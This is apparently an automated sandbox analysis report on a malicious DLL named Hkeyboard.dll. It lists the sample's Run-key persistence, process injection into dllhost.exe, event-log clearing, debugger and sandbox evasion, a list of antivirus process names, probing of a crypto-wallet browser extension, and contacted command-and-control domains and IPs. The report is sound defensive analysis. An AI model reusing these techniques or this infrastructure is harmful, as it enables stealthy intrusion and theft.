Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?SetDisablePrintScreen@@YAXH@Z
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?UnInstallKBHook@@YAHXZ
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?InstallKBHook@@YAHXZ	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?SetDisablePrintScreen@@YAXH@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?UnInstallKBHook@@YAHXZ	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?InstallKBHook@@YAHXZ	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?SetDisablePrintScreen@@YAXH@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?UnInstallKBHook@@YAHXZ	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\dllhost.exe dllhost.exe	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe	Section loaded: wldp.dll	Jump to behavior

Source: Hkeyboard.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Hkeyboard.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Hkeyboard.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Hkeyboard.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Hkeyboard.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Hkeyboard.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Hkeyboard.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: Hkeyboard.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: Hkeyboard.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Hkeyboard.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Hkeyboard.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Hkeyboard.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Hkeyboard.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_04EC4D60 _memset,_memset,_memset,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RegOpenKeyExA,RegQueryValueExA,lstrcpyA,lstrcpyA,wsprintfA,FreeLibrary,

3_2_04EC4D60

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04EB5D25 push ecx; ret	3_2_04EB5D38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04ED4FFD push ecx; ret	3_2_04ED5010
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04ECBFC0 push eax; ret	3_2_04ECBFC1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04ECF1B8 push eax; ret	3_2_04ECF219
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04ECF268 push eax; ret	3_2_04ECF219
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D0490B1 push ecx; ret	3_2_6D0490C4
Source: C:\Windows\SysWOW64\dllhost.exe	Code function: 8_2_03295A45 push ecx; ret	8_2_03295A58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04165D25 push ecx; ret	11_2_04165D38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0417BFC0 push eax; ret	11_2_0417BFC1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04184FFD push ecx; ret	11_2_04185010
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0417F1B8 push eax; ret	11_2_0417F219
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0417F268 push eax; ret	11_2_0417F219

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\SysWOW64\rundll32.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run proxifer.update

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run proxifer.update	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run proxifer.update	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run rolyer.update	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run rolyer.update	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_04EC58D0 OpenEventLogA,OpenEventLogA,ClearEventLogA,CloseEventLog,

3_2_04EC58D0

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_3-83482

Found stalling execution ending in API Sleep call

Source: C:\Windows\SysWOW64\dllhost.exe

Stalling execution: Execution stalls by calling Sleep

graph_8-13288

Source: C:\Windows\SysWOW64\rundll32.exe	Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)			graph_3-84993
Source: C:\Windows\SysWOW64\dllhost.exe	Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)			graph_8-13495

Source: C:\Windows\SysWOW64\dllhost.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_8-11758
Source: C:\Windows\SysWOW64\rundll32.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_3-83528

Source: C:\Windows\SysWOW64\rundll32.exe

API coverage: 3.7 %

Source: C:\Windows\SysWOW64\dllhost.exe TID: 7264

Thread sleep time: -240000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6D0668DA FindFirstFileExW,

3_2_6D0668DA

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 120000			Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe	Thread delayed: delay time: 60000			Jump to behavior

Source: dllhost.exe, 00000008.00000002.4691549539.00000000032FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
Source: rundll32.exe, 00000003.00000002.4691583091.00000000034CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2239587139.000000000302A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_3-83673
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_3-83468
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_3-84503
Source: C:\Windows\SysWOW64\dllhost.exe	API call chain: ExitProcess graph end node	graph_8-11759
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_11-24917

Source: C:\Windows\SysWOW64\dllhost.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Windows\SysWOW64\rundll32.exe

Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep

graph_3-84501

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_04EB21EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_04EB21EB

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_04EC48A0 OutputDebugStringA,ExitProcess,GetModuleFileNameA,_memset,_memset,_sprintf,lstrlenA,__time64,__localtime64,_memset,wsprintfA,CreateMutexA,GetLastError,ExitProcess,CreateThread,WaitForSingleObject,CloseHandle,wsprintfA,CoUninitialize,

3_2_04EC48A0

Source: C:\Windows\SysWOW64\rundll32.exe

3_2_04EC4D60

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04EFE3AD mov eax, dword ptr fs:[00000030h]	3_2_04EFE3AD
Source: C:\Windows\SysWOW64\dllhost.exe	Code function: 8_2_032B73AD mov eax, dword ptr fs:[00000030h]	8_2_032B73AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_041AE3AD mov eax, dword ptr fs:[00000030h]	11_2_041AE3AD

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_04EBEC24 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

3_2_04EBEC24

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04EB21EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_04EB21EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04EB5ABF _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_04EB5ABF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D049B8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6D049B8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D04FADC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6D04FADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D0495EA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6D0495EA
Source: C:\Windows\SysWOW64\dllhost.exe	Code function: 8_2_032957E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_032957E6
Source: C:\Windows\SysWOW64\dllhost.exe	Code function: 8_2_032920E4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_032920E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_041621EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_041621EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_04165ABF _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_04165ABF

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 104.21.40.214 443			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 81.31.208.36 8081			Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\SysWOW64\rundll32.exe

Memory allocated: C:\Windows\SysWOW64\dllhost.exe base: 3290000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_04EB2000 _memset,CreateProcessA,Wow64GetThreadContext,VirtualAllocEx,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,

3_2_04EB2000

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\rundll32.exe

Memory written: C:\Windows\SysWOW64\dllhost.exe base: 3290000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\rundll32.exe

Memory written: C:\Windows\SysWOW64\dllhost.exe base: 3290000

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",#1			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\dllhost.exe dllhost.exe			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6D062DFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_6D06B929
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	3_2_6D06B800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_6D06BB05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	3_2_6D06BA2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6D06B522
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_6D06B5AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6D06B43C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6D06B487
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	3_2_6D06B190
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	3_2_6D06B395
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ?SetDisablePrintScreen@@YAXH@Z,GetLocaleInfoW,	3_2_6D0633BD

Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_04EBA4BF GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

3_2_04EBA4BF

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_04EB8827 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

3_2_04EB8827

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_04EC3970 _memset,GetVersionExA,_strncpy,

3_2_04EC3970

Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: avcenter.exe
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: 360tray.exe
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: rtvscan.exe
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: ashDisp.exe
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: AYAgent.aye
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: RavMonD.exe
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: Mcshield.exe
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe

Stealing of Sensitive Information

Tries to access browser extension known for cryptocurrency wallets

Source: C:\Windows\SysWOW64\rundll32.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\			Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D01BDE0 socket,socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,closesocket,	3_2_6D01BDE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D02EF49 bind,WSAGetLastError,	3_2_6D02EF49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D036760 ?UnInstallKBHook@@YAHXZ,htons,htons,htons,bind,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	3_2_6D036760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D028100 _strncpy,?UnInstallKBHook@@YAHXZ,getsockname,WSAGetLastError,WSAGetLastError,WSAGetLastError,htons,WSAGetLastError,bind,WSAGetLastError,getsockname,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,htons,	3_2_6D028100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D02F180 bind,WSAGetLastError,	3_2_6D02F180

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	2 System Time Discovery	1 Exploitation of Remote Services	12 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	Scheduled Task/Job	11 Registry Run Keys / Startup Folder	511 Process Injection	2 Obfuscated Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	1 System Shutdown/Reboot
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Security Account Manager	23 System Information Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Virtualization/Sandbox Evasion	NTDS	141 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	511 Process Injection	LSA Secrets	111 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Rundll32	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Indicator Removal	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Hkeyboard.dll	3%	ReversingLabs	Win32.Dropper.Generic

Source	Detection	Scanner	Label
https://www.dj5a2sbj.icu/yj/update.xmlsecur32.dll	0%	Avira URL Cloud	safe
https://www.dj5a2sbj.icu/yj/update.xml	0%	Avira URL Cloud	safe
https://www.dj5a2sbj.icu/yj/update.xmlVirtualProtectVirtualAllocwinosX	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.dj5a2sbj.icu	104.21.40.214	true	true		unknown
api.mods4ws.me	103.252.117.185	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.dj5a2sbj.icu/yj/update.xml	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	rundll32.exe, rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dll	false		high
https://curl.se/docs/alt-svc.html#	rundll32.exe	false		high
https://www.dj5a2sbj.icu/yj/update.xmlsecur32.dll	rundll32.exe, 00000003.00000002.4691583091.00000000034CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/http-cookies.html#	rundll32.exe	false		high
https://curl.se/docs/alt-svc.html	rundll32.exe, rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dll	false		high
https://curl.se/docs/http-cookies.html	rundll32.exe, rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dll	false		high
https://curl.se/docs/hsts.html#	rundll32.exe	false		high
https://www.dj5a2sbj.icu/yj/update.xmlVirtualProtectVirtualAllocwinosX	rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dll	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.252.117.185	api.mods4ws.me	India	134032	ICENET-AS-ININFONETCOMMENTERPRISESIN	false
104.21.40.214	www.dj5a2sbj.icu	United States	13335	CLOUDFLARENETUS	true
81.31.208.36	unknown	Ireland	48142	PERMANETASIE	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578296
Start date and time:	2024-12-19 14:47:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Hkeyboard.dll
Detection:	MAL
Classification:	mal100.spyw.evad.winDLL@23/1@2/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 93 Number of non-executed functions: 302
Cookbook Comments:	Found application associated with file extension: .dll Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.231.128.66, 20.31.169.57, 13.107.246.63, 104.126.37.184, 172.202.163.200, 150.171.27.10, 2.16.158.32, 23.218.208.109, 20.199.58.43
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Hkeyboard.dll

Simulations

Behavior and APIs

Time	Type	Description
08:48:19	API Interceptor	1x Sleep call for process: loaddll32.exe modified
08:48:37	API Interceptor	9x Sleep call for process: dllhost.exe modified
14:48:10	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run proxifer.update "C:\Windows\SysWOW64\rundll32.exe"
14:48:18	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run rolyer.update "C:\Windows\SysWOW64\rundll32.exe"
14:48:26	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run proxifer.update "C:\Windows\SysWOW64\rundll32.exe"

